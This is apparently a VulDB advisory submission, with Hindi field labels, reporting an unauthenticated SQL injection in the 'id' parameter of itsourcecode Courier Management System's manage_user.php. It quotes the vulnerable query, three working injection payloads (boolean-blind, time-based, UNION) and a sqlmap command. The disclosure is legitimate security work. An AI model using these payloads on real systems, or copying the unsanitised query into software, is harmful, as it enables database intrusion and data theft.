| शीर्षक | itsourcecode Courier Management System 1.0 SQL Injection |
|---|
| विवरण | A SQL injection vulnerability was found in itsourcecode Courier
Management System 1.0. The vulnerability exists in the file
/manage_user.php at line 5. The manipulation of the argument "id"
via GET parameter leads to SQL injection. No authentication is
required to exploit this vulnerability. The attack may be launched
remotely.
Vulnerable code:
$user = $conn->query("SELECT * FROM users where id =".$_GET['id']);
The file /manage_user.php contains no session check or login
verification before processing user input.
Tested injection types:
1. Boolean-based blind:
id=(SELECT (CASE WHEN (1679=1679) THEN 1 ELSE (SELECT 2926 UNION SELECT 3592) END))
2. Time-based blind (5 second delay confirmed):
id=1 AND (SELECT 2340 FROM (SELECT(SLEEP(5)))VRZs)
3. UNION query (8 columns):
id=-7753 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71766a7a71,0x75426f454f47726f6659416e4d424474484a69636e4569694d674b6c4c47705145566572516f4c53,0x7171627871),NULL,NULL,NULL,NULL-- -
Verified using sqlmap:
sqlmap --random-agent --batch -u "http://target/manage_user.php?id=1" --dbms=mysql --current-db.
I have already informed the supplier about the relevant loopholes. |
|---|
| स्रोत | ⚠️ https://lhzzz08.github.io/posts/cveapplication3/ |
|---|
| उपयोगकर्ता | zzl08 (UID 93909) |
|---|
| सबमिशन | 02/05/2026 05:11 PM (1 महीना पहले) |
|---|
| संयम | 26/05/2026 06:16 PM (24 days later) |
|---|
| स्थिति | स्वीकृत |
|---|
| VulDB प्रविष्टि | 365679 [itsourcecode Courier Management System 1.0 /manage_user.php पहचान SQL इंजेक्शन] |
|---|
| अंक | 20 |
|---|